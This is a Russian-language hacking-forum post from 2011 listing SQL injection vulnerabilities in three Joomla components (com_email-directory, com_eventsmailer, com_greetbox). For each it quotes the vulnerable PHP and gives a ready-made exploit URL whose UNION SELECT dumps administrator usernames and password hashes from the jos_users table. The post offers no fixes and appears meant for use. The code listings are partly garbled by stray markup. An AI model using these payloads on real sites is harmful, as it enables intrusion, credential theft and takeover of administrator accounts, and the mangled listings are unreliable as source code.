Тема: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
Показать сообщение отдельно

  #227  
Старый 12.09.2011, 03:12
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
com_email-directory SQL-inj [1.5 && 1.6]

image.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]// formula string

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_password[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not connect"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_db[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not select database"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT email FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$mosConfig_dbprefix[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]emails_list WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"MySQL query: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" failed with error: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

...

[/COLOR][/COLOR
exploit:

Код:
http://j15/index.php?option=com_emaildirectory&nshow=image&view=photos&id=-666++union+select+group_concat(username,0x3a,password+SEPARATOR+0x3c62723e)+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
com_eventsmailer SQL-inj in LIMIT [1.5]

simpleshow.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

 function[/COLOR][COLOR="#0000BB"]getAdminSettings[/COLOR][COLOR="#007700"]() {

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM #__eventsmailer LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'max']"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]= array();

foreach([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"];

 }

return[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"];

 }

...

[/COLOR][/COLOR
exploit:

Код:
http://j15/index.php?option=com_eventsmailer&view=events&max=-666666666++union+select+1,2,3,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),5,6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
com_greetbox SQL-inj in LIMIT [1.5 && 1.6]

funcs.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_greetbox'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'default_greeting'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from #__greetbox LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mva'l]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

 foreach([/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pattern[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#DD0000"]/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]greeting[/COLOR][COLOR="#007700"];

 break;

 }

 }

...

[/COLOR][/COLOR
exploit:

Код:
http://j15/index.php?option=com_greetbox&view=boxes&mval=-999999999+union+select+1,2,3,4,5,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
 
Ответить с цитированием